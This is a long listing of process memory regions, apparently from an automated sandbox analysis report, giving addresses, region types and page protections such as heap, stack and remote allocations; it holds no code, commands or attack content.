heap
|
page read and write
|
||
|
23D72770000
|
heap
|
page read and write
|
||
|
23C50978000
|
heap
|
page read and write
|
||
|
30B8000
|
heap
|
page read and write
|
||
|
23C50DDC000
|
heap
|
page read and write
|
||
|
13D000
|
stack
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
6E2E000
|
stack
|
page read and write
|
||
|
AD4E7FD000
|
stack
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
AD4E1FE000
|
stack
|
page read and write
|
||
|
27C8000
|
stack
|
page read and write
|
||
|
23C4ECC2000
|
heap
|
page read and write
|
||
|
83DA000
|
heap
|
page read and write
|
||
|
8130000
|
trusted library allocation
|
page execute and read and write
|
||
|
8700000
|
direct allocation
|
page read and write
|
||
|
726717E000
|
stack
|
page read and write
|
||
|
2478B16A000
|
heap
|
page read and write
|
||
|
6DE0000
|
direct allocation
|
page read and write
|
||
|
86F0000
|
direct allocation
|
page read and write
|
||
|
46AC000
|
stack
|
page read and write
|
||
|
2B00000
|
heap
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
7447000
|
trusted library allocation
|
page read and write
|
||
|
23C50D95000
|
heap
|
page read and write
|
||
|
23C509A9000
|
heap
|
page read and write
|
||
|
AD4E0FE000
|
stack
|
page read and write
|
||
|
23D72750000
|
heap
|
page read and write
|
||
|
23D725E2000
|
heap
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
3116000
|
heap
|
page read and write
|
||
|
2CF0000
|
trusted library allocation
|
page read and write
|
||
|
AD4E9FE000
|
stack
|
page read and write
|
||
|
5AAF000
|
trusted library allocation
|
page read and write
|
||
|
AD4E4FE000
|
stack
|
page read and write
|
||
|
23C4ECDC000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
726737E000
|
stack
|
page read and write
|
||
|
A3BB000
|
direct allocation
|
page execute and read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
23C50957000
|
heap
|
page read and write
|
||
|
23D72622000
|
heap
|
page read and write
|
||
|
23D5AAAD000
|
trusted library allocation
|
page read and write
|
||
|
23D725E7000
|
heap
|
page read and write
|
||
|
23C50D90000
|
heap
|
page read and write
|
||
|
23D59FF0000
|
trusted library allocation
|
page read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
6D6B000
|
stack
|
page read and write
|
||
|
2950000
|
heap
|
page read and write
|
||
|
23D728C0000
|
heap
|
page read and write
|
||
|
85A0000
|
trusted library allocation
|
page read and write
|
||
|
23D725E0000
|
heap
|
page read and write
|
||
|
75C0000
|
trusted library allocation
|
page read and write
|
||
|
8D77000
|
trusted library allocation
|
page read and write
|
||
|
7DF3FDF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
838C000
|
stack
|
page read and write
|
||
|
2760000
|
heap
|
page read and write
|
||
|
23C4EC3A000
|
heap
|
page read and write
|
||
|
8040000
|
trusted library allocation
|
page execute and read and write
|
||
|
AD4E3FE000
|
stack
|
page read and write
|
||
|
23C4EBE0000
|
heap
|
page read and write
|
||
|
8710000
|
direct allocation
|
page read and write
|
||
|
23C4EC0B000
|
heap
|
page read and write
|
||
|
4F53000
|
trusted library allocation
|
page read and write
|
||
|
2CBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
80CD000
|
stack
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
2DD2000
|
heap
|
page read and write
|
||
|
48E0000
|
heap
|
page execute and read and write
|
||
|
6D50000
|
direct allocation
|
page read and write
|
||
|
23C4EC37000
|
heap
|
page read and write
|
||
|
23C4EC0C000
|
heap
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
AD4E5FF000
|
stack
|
page read and write
|
||
|
7FFD3477D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8060000
|
trusted library allocation
|
page read and write
|
||
|
2289C000
|
stack
|
page read and write
|
||
|
5949000
|
trusted library allocation
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
23C4ECDC000
|
heap
|
page read and write
|
||
|
7FFD34952000
|
trusted library allocation
|
page read and write
|
||
|
23D5A117000
|
heap
|
page read and write
|
||
|
23D59FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D5A711000
|
trusted library allocation
|
page read and write
|
||
|
83B0000
|
heap
|
page read and write
|
||
|
23D726B9000
|
heap
|
page read and write
|
||
|
23D5BA1E000
|
trusted library allocation
|
page read and write
|
||
|
23C4EE38000
|
heap
|
page read and write
|
||
|
2CB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2281B000
|
stack
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
86C0000
|
direct allocation
|
page read and write
|
||
|
482B000
|
remote allocation
|
page execute and read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
479E000
|
stack
|
page read and write
|
||
|
23C4EA80000
|
heap
|
page read and write
|
||
|
45B0000
|
trusted library allocation
|
page read and write
|
||
|
769C000
|
stack
|
page read and write
|
||
|
2285E000
|
stack
|
page read and write
|
||
|
7450000
|
trusted library allocation
|
page read and write
|
||
|
23D72890000
|
heap
|
page read and write
|
||
|
75F0000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
direct allocation
|
page read and write
|
||
|
7FFD34772000
|
trusted library allocation
|
page read and write
|
||
|
23C4ECCC000
|
heap
|
page read and write
|
||
|
23D6A59A000
|
trusted library allocation
|
page read and write
|
||
|
23C4EC2E000
|
heap
|
page read and write
|
||
|
3154000
|
heap
|
page read and write
|
||
|
23C4EC2F000
|
heap
|
page read and write
|
||
|
23C4ECAF000
|
heap
|
page read and write
|
||
|
23C5093B000
|
heap
|
page read and write
|
||
|
75A0000
|
trusted library allocation
|
page read and write
|
||
|
7070000
|
heap
|
page read and write
|
||
|
2972000
|
heap
|
page read and write
|
||
|
2CB4000
|
trusted library allocation
|
page read and write
|
||
|
225CE000
|
stack
|
page read and write
|
||
|
4750000
|
heap
|
page read and write
|
||
|
86B0000
|
direct allocation
|
page read and write
|
||
|
23D58970000
|
heap
|
page read and write
|
||
|
221F0000
|
heap
|
page read and write
|
||
|
23C4EE3A000
|
heap
|
page read and write
|
||
|
23C4EBC0000
|
heap
|
page read and write
|
||
|
3154000
|
heap
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
23D5A0D0000
|
heap
|
page read and write
|
||
|
6E30000
|
direct allocation
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
6EC0000
|
heap
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
23C4ECBD000
|
heap
|
page read and write
|
||
|
7FFD3478B000
|
trusted library allocation
|
page read and write
|
||
|
72671FC000
|
stack
|
page read and write
|
||
|
23C50931000
|
heap
|
page read and write
|
||
|
5AB5000
|
trusted library allocation
|
page read and write
|
||
|
AD4E8FE000
|
stack
|
page read and write
|
||
|
8392000
|
heap
|
page read and write
|
||
|
23C4EC12000
|
heap
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
23D5BBC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34773000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
2C80000
|
trusted library section
|
page read and write
|
||
|
726783B000
|
stack
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
2279E000
|
stack
|
page read and write
|
||
|
27FC000
|
heap
|
page read and write
|
||
|
726830D000
|
stack
|
page read and write
|
||
|
8670000
|
direct allocation
|
page read and write
|
||
|
4855000
|
heap
|
page execute and read and write
|
||
|
7291000
|
heap
|
page read and write
|
||
|
2D43000
|
heap
|
page read and write
|
||
|
23D5AA8E000
|
trusted library allocation
|
page read and write
|
||
|
2B6E000
|
stack
|
page read and write
|
||
|
23C50D97000
|
heap
|
page read and write
|
||
|
7600000
|
trusted library allocation
|
page read and write
|
||
|
2B88000
|
heap
|
page read and write
|
||
|
8730000
|
direct allocation
|
page read and write
|
||
|
81B5000
|
trusted library allocation
|
page read and write
|
||
|
834E000
|
stack
|
page read and write
|
||
|
23D726D8000
|
heap
|
page read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
7590000
|
trusted library allocation
|
page read and write
|
||
|
726727F000
|
stack
|
page read and write
|
||
|
23C4ECCB000
|
heap
|
page read and write
|
||
|
23C50945000
|
heap
|
page read and write
|
||
|
6D90000
|
direct allocation
|
page read and write
|
||
|
2478AFA0000
|
heap
|
page read and write
|
||
|
758D000
|
stack
|
page read and write
|
||
|
3157000
|
heap
|
page read and write
|
||
|
3155000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
23C4EE37000
|
heap
|
page read and write
|
||
|
23C4ECC7000
|
heap
|
page read and write
|
||
|
72676BE000
|
stack
|
page read and write
|
||
|
6E40000
|
direct allocation
|
page read and write
|
||
|
23D58625000
|
heap
|
page read and write
|
||
|
23C50931000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
83C9000
|
heap
|
page read and write
|
||
|
23D58550000
|
heap
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
278C000
|
stack
|
page read and write
|
||
|
4900000
|
trusted library allocation
|
page execute and read and write
|
||
|
3144000
|
heap
|
page read and write
|
||
|
23D5AA7B000
|
trusted library allocation
|
page read and write
|
||
|
72677BE000
|
stack
|
page read and write
|
||
|
8590000
|
trusted library allocation
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
23C50921000
|
heap
|
page read and write
|
||
|
8660000
|
trusted library allocation
|
page read and write
|
||
|
2478B160000
|
heap
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
trusted library allocation
|
page read and write
|
||
|
489E000
|
stack
|
page read and write
|
||
|
72673FE000
|
stack
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
23D5A8D2000
|
trusted library allocation
|
page read and write
|
||
|
705F000
|
stack
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page read and write
|
||
|
2A0E000
|
unkown
|
page read and write
|
||
|
23D5866E000
|
heap
|
page read and write
|
||
|
6DF0000
|
direct allocation
|
page read and write
|
||
|
23D5A76B000
|
trusted library allocation
|
page read and write
|
||
|
72674BE000
|
stack
|
page read and write
|
||
|
23C50DDD000
|
heap
|
page read and write
|
||
|
8680000
|
direct allocation
|
page read and write
|
||
|
23C4EC38000
|
heap
|
page read and write
|
||
|
726838A000
|
stack
|
page read and write
|
||
|
23C4EC35000
|
heap
|
page read and write
|
||
|
22570000
|
direct allocation
|
page read and write
|
||
|
229E0000
|
heap
|
page read and write
|
||
|
47DF000
|
stack
|
page read and write
|
||
|
23C4ECA7000
|
heap
|
page read and write
|
||
|
277D000
|
stack
|
page read and write
|
||
|
2974000
|
heap
|
page read and write
|
||
|
23D726A9000
|
heap
|
page read and write
|
||
|
481E000
|
stack
|
page read and write
|
||
|
ADBB000
|
direct allocation
|
page execute and read and write
|
||
|
6D2D000
|
stack
|
page read and write
|
||
|
227DF000
|
stack
|
page read and write
|
||
|
273F000
|
unkown
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
23D5AA41000
|
trusted library allocation
|
page read and write
|
||
|
71E0000
|
heap
|
page read and write
|
||
|
23D58560000
|
heap
|
page read and write
|
||
|
2B5E000
|
stack
|
page read and write
|
||
|
23C5093C000
|
heap
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
75E0000
|
trusted library allocation
|
page read and write
|
||
|
2291C000
|
stack
|
page read and write
|
||
|
23D59FF2000
|
trusted library allocation
|
page read and write
|
||
|
6D30000
|
heap
|
page readonly
|
||
|
7410000
|
trusted library allocation
|
page read and write
|
||
|
48DE000
|
stack
|
page read and write
|
||
|
295C000
|
heap
|
page read and write
|
||
|
23D6A2C1000
|
trusted library allocation
|
page read and write
|
||
|
23C4EC7B000
|
heap
|
page read and write
|
||
|
23D5AA59000
|
trusted library allocation
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page read and write
|
||
|
4A77000
|
trusted library allocation
|
page read and write
|
||
|
72672FE000
|
stack
|
page read and write
|
||
|
23D58629000
|
heap
|
page read and write
|
||
|
23C50929000
|
heap
|
page read and write
|
||
|
23D5C0FB000
|
trusted library allocation
|
page read and write
|
||
|
2CB0000
|
trusted library allocation
|
page read and write
|
||
|
8690000
|
direct allocation
|
page read and write
|
||
|
4910000
|
heap
|
page read and write
|
||
|
2295E000
|
stack
|
page read and write
|
||
|
22550000
|
direct allocation
|
page read and write
|
||
|
2976000
|
heap
|
page read and write
|
||
|
23C5093F000
|
heap
|
page read and write
|
||
|
23C5093B000
|
heap
|
page read and write
|
||
|
23D5A325000
|
trusted library allocation
|
page read and write
|
||
|
23C5093C000
|
heap
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
2B0F000
|
unkown
|
page read and write
|
||
|
2271C000
|
stack
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page execute and read and write
|
||
|
E1D000
|
stack
|
page read and write
|
||
|
2478B0A0000
|
heap
|
page read and write
|
||
|
23D5A110000
|
heap
|
page read and write
|
||
|
23C50988000
|
heap
|
page read and write
|
||
|
2CA0000
|
trusted library allocation
|
page read and write
|
||
|
23C4EE39000
|
heap
|
page read and write
|
||
|
2DD5000
|
heap
|
page read and write
|
||
|
726840B000
|
stack
|
page read and write
|
||
|
2CEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
81E0000
|
trusted library allocation
|
page read and write
|
||
|
23C5093F000
|
heap
|
page read and write
|
||
|
2C90000
|
trusted library section
|
page read and write
|
||
|
6E80000
|
heap
|
page read and write
|
||
|
23C4ECB8000
|
heap
|
page read and write
|
||
|
6D60000
|
direct allocation
|
page read and write
|
||
|
6E10000
|
direct allocation
|
page read and write
|
||
|
23C5093A000
|
heap
|
page read and write
|
||
|
8740000
|
direct allocation
|
page read and write
|
||
|
23C4EC9E000
|
heap
|
page read and write
|
||
|
30DE000
|
heap
|
page read and write
|
||
|
23D6A2A1000
|
trusted library allocation
|
page read and write
|
||
|
2CDA000
|
heap
|
page read and write
|
||
|
5989000
|
trusted library allocation
|
page read and write
|
||
|
7F370000
|
trusted library allocation
|
page execute and read and write
|
||
|
662B000
|
remote allocation
|
page execute and read and write
|
||
|
23C4EE3A000
|
heap
|
page read and write
|
||
|
7FFD34826000
|
trusted library allocation
|
page read and write
|
||
|
6E77000
|
heap
|
page read and write
|
||
|
2478B155000
|
heap
|
page read and write
|
||
|
228DE000
|
stack
|
page read and write
|
||
|
722D000
|
heap
|
page read and write
|
||
|
522B000
|
remote allocation
|
page execute and read and write
|
||
|
80D0000
|
heap
|
page read and write
|
||
|
23C4ECA7000
|
heap
|
page read and write
|
||
|
46B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
279D000
|
stack
|
page read and write
|
||
|
23D5A060000
|
heap
|
page execute and read and write
|
||
|
23C5093B000
|
heap
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
23D5BF20000
|
trusted library allocation
|
page read and write
|
||
|
726820E000
|
stack
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
23D585E0000
|
heap
|
page read and write
|
||
|
23C4EC34000
|
heap
|
page read and write
|
||
|
7FFD34856000
|
trusted library allocation
|
page execute and read and write
|
||
|
830C000
|
stack
|
page read and write
|
||
|
7296000
|
heap
|
page read and write
|
||
|
23C50931000
|
heap
|
page read and write
|
||
|
23D5A4C6000
|
trusted library allocation
|
page read and write
|
||
|
23C4EB60000
|
heap
|
page read and write
|
||
|
72BF000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
8FBB000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD34774000
|
trusted library allocation
|
page read and write
|
||
|
6F6B000
|
stack
|
page read and write
|
||
|
2B80000
|
heap
|
page read and write
|
||
|
6E70000
|
heap
|
page read and write
|
||
|
5921000
|
trusted library allocation
|
page read and write
|
||
|
23D7289A000
|
heap
|
page read and write
|
||
|
72A3000
|
heap
|
page read and write
|
||
|
8407000
|
heap
|
page read and write
|
||
|
83D6000
|
heap
|
page read and write
|
||
|
6E6A000
|
stack
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
2BF8000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
23C50DB8000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
83C2000
|
heap
|
page read and write
|
||
|
E5E000
|
stack
|
page read and write
|
||
|
231D000
|
stack
|
page read and write
|
||
|
4850000
|
heap
|
page execute and read and write
|
||
|
263E000
|
unkown
|
page read and write
|
||
|
463E000
|
stack
|
page read and write
|
||
|
7FFD3492A000
|
trusted library allocation
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
229DE000
|
stack
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
23C50960000
|
heap
|
page read and write
|
||
|
6E20000
|
direct allocation
|
page read and write
|
||
|
4710000
|
trusted library allocation
|
page read and write
|
||
|
23C4ECB2000
|
heap
|
page read and write
|
||
|
6DD0000
|
direct allocation
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
23D72773000
|
heap
|
page read and write
|
||
|
81D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
726828E000
|
stack
|
page read and write
|
||
|
8720000
|
direct allocation
|
page read and write
|
||
|
28F0000
|
heap
|
page read and write
|
||
|
23C4EC11000
|
heap
|
page read and write
|
||
|
30F3000
|
heap
|
page read and write
|
||
|
2CF5000
|
trusted library allocation
|
page execute and read and write
|
||
|
8140000
|
trusted library allocation
|
page read and write
|
||
|
72670FE000
|
stack
|
page read and write
|
||
|
23D59FB0000
|
heap
|
page readonly
|
||
|
23D725EE000
|
heap
|
page read and write
|
||
|
8030000
|
heap
|
page read and write
|
||
|
2478B150000
|
heap
|
page read and write
|
||
|
862D000
|
stack
|
page read and write
|
||
|
71DE000
|
stack
|
page read and write
|
||
|
754E000
|
stack
|
page read and write
|
||
|
6F2D000
|
stack
|
page read and write
|
||
|
2D9E000
|
heap
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
D6464FF000
|
unkown
|
page read and write
|
||
|
726743E000
|
stack
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
AD4DD6B000
|
stack
|
page read and write
|
||
|
2299D000
|
stack
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
2CC0000
|
trusted library allocation
|
page read and write
|
||
|
45FE000
|
stack
|
page read and write
|
||
|
30AF000
|
stack
|
page read and write
|
||
|
23C50931000
|
heap
|
page read and write
|
||
|
7266D63000
|
stack
|
page read and write
|
||
|
2275C000
|
stack
|
page read and write
|
||
|
23C50949000
|
heap
|
page read and write
|
||
|
23C4ECAF000
|
heap
|
page read and write
|
||
|
23D5C02C000
|
trusted library allocation
|
page read and write
|
||
|
4658000
|
trusted library allocation
|
page read and write
|
||
|
23C50956000
|
heap
|
page read and write
|
||
|
23D5A2A1000
|
trusted library allocation
|
page read and write
|
||
|
275D000
|
stack
|
page read and write
|
||
|
812F000
|
stack
|
page read and write
|
||
|
4660000
|
remote allocation
|
page execute and read and write
|
||
|
2478B080000
|
heap
|
page read and write
|
||
|
23C50A40000
|
heap
|
page read and write
|
||
|
4758000
|
heap
|
page read and write
|
||
|
23D72AB0000
|
heap
|
page read and write
|
||
|
2B9E000
|
stack
|
page read and write
|
||
|
306E000
|
stack
|
page read and write
|
||
|
6E00000
|
direct allocation
|
page read and write
|
||
|
4921000
|
trusted library allocation
|
page read and write
|
||
|
3142000
|
heap
|
page read and write
|
||
|
48F0000
|
trusted library allocation
|
page read and write
|
||
|
AD4EAFB000
|
stack
|
page read and write
|
||
|
2478B260000
|
heap
|
page read and write
|
||
|
6D80000
|
direct allocation
|
page read and write
|
||
|
2CBE000
|
stack
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
23D728C2000
|
heap
|
page read and write
|
||
|
2D35000
|
heap
|
page read and write
|
||
|
23C5093B000
|
heap
|
page read and write
|
||
|
23D585C0000
|
heap
|
page read and write
|
||
|
7301000
|
heap
|
page read and write
|
||
|
4983000
|
trusted library allocation
|
page read and write
|
||
|
2B1E000
|
stack
|
page read and write
|
||
|
23D5AA6B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
6DB0000
|
direct allocation
|
page read and write
|
||
|
22560000
|
direct allocation
|
page read and write
|
||
|
73F0000
|
trusted library allocation
|
page read and write
|
||
|
726707D000
|
stack
|
page read and write
|
||
|
2260F000
|
stack
|
page read and write
|
||
|
746A000
|
trusted library allocation
|
page read and write
|
||
|
23D5A030000
|
trusted library allocation
|
page read and write
|
There are 533 hidden memdumps, click here to show them.